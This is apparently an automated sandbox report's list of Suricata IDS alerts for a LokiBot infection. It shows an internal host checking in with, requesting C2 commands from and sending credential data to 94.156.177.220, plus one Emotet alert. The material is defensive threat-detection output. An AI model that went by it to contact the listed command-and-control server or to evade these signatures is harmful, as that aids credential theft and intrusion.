        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49233 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49201
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49239 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49239 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49238 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49254 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49241 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49241 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49238 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49225
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49254 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49254 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49185 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49210 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49210 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49228 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49228 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49185 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49228 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49200 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49241 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49228 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49255 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49255 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49238
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49241 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49228 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49210
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49228
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49248 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49248 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49248 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49234
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49248 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49248 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49219 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49255
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49219 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49217 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49241 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49233 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49239 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49241
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49217 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49233 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49217 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49233 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49254
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49185 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49233
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49224 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49219
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49224 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49217 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49224 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49180 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49180 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49217 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49188 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49188 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49200 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49178 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49200
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49178 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49178 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49224 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49224 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49240 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49240 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49208 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49208 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49217
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49248
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49224
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49218 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49208 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49242 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49242 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49208 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49242 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49208 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49218 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49218 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49208
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49242 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49242 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49218
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49239 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49242
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49239 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49239
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49249 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49249 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49249 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49229 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49229 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49229 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49249 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49249 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49246 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49246 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49240 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49249
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49240 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49240 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49240
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49245 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49245 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49245 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49229 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49229 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49245 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49245 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49229
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49246 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49246 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49246 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49185
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49246
        Source: Network trafficSuricata IDS: 2035065 - Severity 1 - ET MALWARE W32/Emotet.v4 Checkin Fake 404 Payload Response : 94.156.177.220:80 -> 192.168.2.22:49246
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49245
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49206 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49206 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49206 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49253 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49253 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49253 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49206 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49206 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49253 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49253 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49206
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49253
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49223 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49223 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49223 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49223 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49223 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49223
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49188 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49188 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49188 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49188
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49237 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49237 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49237 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49237 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49237 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49237
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49250 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49250 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49250 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49250 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49250 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49250
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49180 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49180 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49180 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49211 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.22:49178 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49227 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49227 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49227 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49227 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49227 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49227
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49180
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49211
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49197 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49197 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49197 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49197 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49197 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49232 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49232 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49232 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49197
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49232 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49232 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49203 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49203 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49203 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49232
        Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49203 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49203 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49251 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49203
        Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49204 -> 94.156.177.220:80
        Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49204 -> 94.156.177.220:80
